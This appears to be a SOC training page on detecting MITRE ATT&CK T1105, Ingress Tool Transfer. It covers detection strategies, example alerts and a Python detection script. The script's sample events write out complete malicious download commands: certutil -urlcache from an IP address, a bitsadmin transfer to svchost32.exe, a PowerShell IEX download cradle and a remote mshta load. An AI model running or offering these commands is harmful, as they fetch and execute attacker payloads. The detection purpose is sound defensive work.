T1105 | Command and Control | Medium difficulty

Ingress Tool Transfer

Ingress Tool Transfer (T1105) is a MITRE ATT&CK technique in the Command and Control tactic. SOC analysts detect it by monitoring Firewall, XDR, and SIEM events for behavioral anomalies and the specific indicators described in this detection guide. Practice detection in SOCSimulator Operations.

Firewall, XDR, SIEM

What is Ingress Tool Transfer?

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary-controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (lateral tool transfer). On Windows, tools commonly used for ingress tool transfer include certutil, bitsadmin, PowerShell Invoke-WebRequest, and curl. On Linux, wget, curl, and custom download scripts are frequently used. Attackers stage their tooling and payloads on external infrastructure such as GitHub repositories, legitimate cloud storage services, and compromised websites to make retrieval appear legitimate and to evade reputation-based blocking.

Ingress Tool Transfer is documented as technique T1105 in the MITRE ATT&CK knowledge base under the Command and Control tactic. Detection requires visibility into Firewall, XDR, and SIEM telemetry.

Detection Strategies

The following detection strategies help SOC analysts identify Ingress Tool Transfer activity. These methods apply across Firewall, XDR, and SIEM environments and can be implemented as detection rules, correlation queries, or behavioral analytics in your security platform.

1. Monitor Windows built-in utilities being used for file download, including certutil -urlcache, bitsadmin /transfer, mshta downloading from remote URLs, and regsvr32 pointing to remote scripts.

2. Alert on PowerShell Invoke-WebRequest, wget, and curl commands downloading content from external URLs, particularly when the destination file is saved to executable paths or subsequently executed.

3. Detect downloads from suspicious sources, including newly registered domains, domains using dynamic DNS, free hosting services, and paste site URLs, which are commonly used to host malware payloads.

4. Monitor network connections from unusual processes to external IP addresses, particularly when the connection results in a file being written to disk and then executed within a short time window.

5. Track file creation events on web servers and other internet-connected systems for executable files being written by web server processes, which may indicate web shell uploads or remote code execution.

Example Alerts

These realistic alert examples show what Ingress Tool Transfer looks like in your security tools. Use them to tune detection rules and train analysts to recognize true positives versus false positives in live environments.

High | XDR

Certutil Used to Download Malware

Certutil.exe executed with -urlcache -split -f parameters downloading a file named "update.cer" from 45.142.212.100. Despite the .cer extension, file analysis confirms the downloaded content is a PE executable. Certutil is commonly used as a living-off-the-land binary for malware download because it is trusted and available on all Windows systems, often whitelisted by application control policies.

Critical | XDR

PowerShell Download Cradle Execution

PowerShell executed with IEX (Invoke-Expression) and Invoke-WebRequest downloading a script from raw.githubusercontent.com and executing it in memory without writing to disk. The GitHub account hosting the payload was created 2 hours before the download. The in-memory execution avoids file-based detection and the use of GitHub makes the connection appear legitimate to network controls.

High | SIEM

Malware Downloaded via BITS Job

BITS service created a background transfer job downloading content from an external URL to C:\Windows\Temp\svchost32.exe. BITS jobs persist across reboots and run as SYSTEM, making this technique effective for both tool transfer and persistence. The destination filename mimics a legitimate Windows process. The source URL resolves to a VPS hosting provider with no legitimate business relationship to the organization.
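Detection logic for the command-line patterns named in detection strategies 1 and 2 and reflected in the three example alerts above, as an added Python example that is not SOCSimulator's code. The process-creation events are constructed, and the rule names, severities and field names (`host`, `image`, `cmdline`) are assumptions; the certutil, bitsadmin, mshta, regsvr32 and PowerShell Invoke-WebRequest/IEX patterns are the ones the page describes.

```python
import re

# Constructed sample process-creation events (not real telemetry): one per
# download primitive named in the detection strategies, plus two benign events.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://45.142.212.100/update.cer C:\Users\Public\update.cer"},
    {"host": "WS02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd http://cdn.example.invalid/s.bin C:\Windows\Temp\svchost32.exe"},
    {"host": "WS03", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden IEX (Invoke-WebRequest https://raw.githubusercontent.com/acct/repo/main/p.ps1).Content"},
    {"host": "WS04", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://static.example.invalid/page.hta"},
    {"host": "WS05", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -dump C:\certs\corp.cer"},          # benign: no remote URL
    {"host": "WS06", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\App\lib.dll"},  # benign: local DLL
]

URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".ps1", ".hta", ".vbs", ".js", ".bat", ".scr")

# (rule name, severity, process image(s), predicate on the lower-cased command line)
RULES = [
    ("certutil_urlcache_download", "high", "certutil.exe", lambda c: "-urlcache" in c or "/urlcache" in c),
    ("bitsadmin_transfer", "high", "bitsadmin.exe", lambda c: "/transfer" in c),
    ("powershell_download_cradle", "critical", "powershell.exe",
     lambda c: "invoke-webrequest" in c and re.search(r"\biex\b|invoke-expression", c) is not None),
    ("mshta_remote_url", "high", "mshta.exe", lambda c: True),
    ("regsvr32_remote_script", "high", "regsvr32.exe", lambda c: True),
    ("downloader_to_executable_path", "high", ("curl.exe", "wget.exe"),
     lambda c: any(t.endswith(EXEC_EXT) and not URL_RE.match(t) for t in c.split())),
]

def detect(event):
    """Return [(rule_name, severity), ...]; every rule also requires a remote URL on the command line."""
    cmd = event["cmdline"]
    if not URL_RE.search(cmd):
        return []  # routine local use of these binaries carries no URL, so it never matches
    image = event["image"].rsplit("\\", 1)[-1].lower()
    low = cmd.lower()
    return [(name, sev) for name, sev, binary, pred in RULES
            if image in (binary if isinstance(binary, tuple) else (binary,)) and pred(low)]

def run(events):
    """Evaluate every event and return only the ones that produced findings."""
    return [{"host": e["host"], "findings": detect(e)} for e in events if detect(e)]
```

Running `run(SAMPLE_EVENTS)` flags the four download events and leaves the two benign ones out; the URL requirement is what keeps the local certutil and regsvr32 invocations from alerting.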

Practice Detecting Ingress Tool Transfer

SOCSimulator provides hands-on training rooms where you investigate real-world attack scenarios including Ingress Tool Transfer. Build detection skills with zero consequences — free forever.


Frequently Asked Questions

How do SOC analysts detect Ingress Tool Transfer?
SOC analysts detect Ingress Tool Transfer (T1105) by monitoring Firewall, XDR, and SIEM telemetry for behavioral anomalies and specific indicators. Key detection methods include monitoring Windows built-in utilities being used for file download, including certutil -urlcache, bitsadmin /transfer, and mshta downloading from remote URLs. SOCSimulator provides hands-on practice detecting this technique with realistic alerts.
What security tools are used to detect Ingress Tool Transfer?
Ingress Tool Transfer can be detected using Firewall, XDR, and SIEM platforms. Firewall tools are particularly effective for this technique because they provide visibility into the command and control phase of the attack chain. SOCSimulator simulates all three tool types for hands-on training.
How common is Ingress Tool Transfer in real-world attacks?
Ingress Tool Transfer is a well-documented MITRE ATT&CK technique in the Command and Control tactic. It appears in threat intelligence reports from multiple security vendors and has been observed in campaigns by various threat actor groups. SOCSimulator includes realistic Ingress Tool Transfer scenarios based on documented attack patterns, helping analysts build detection intuition.
Can I practice detecting Ingress Tool Transfer for free?
Yes. SOCSimulator offers free forever access to training scenarios, including Command and Control techniques like Ingress Tool Transfer. You can investigate realistic alerts in guided Operations rooms, build detection skills with SIEM, XDR, and Firewall interfaces, and test yourself under pressure in Shift Mode. No credit card required.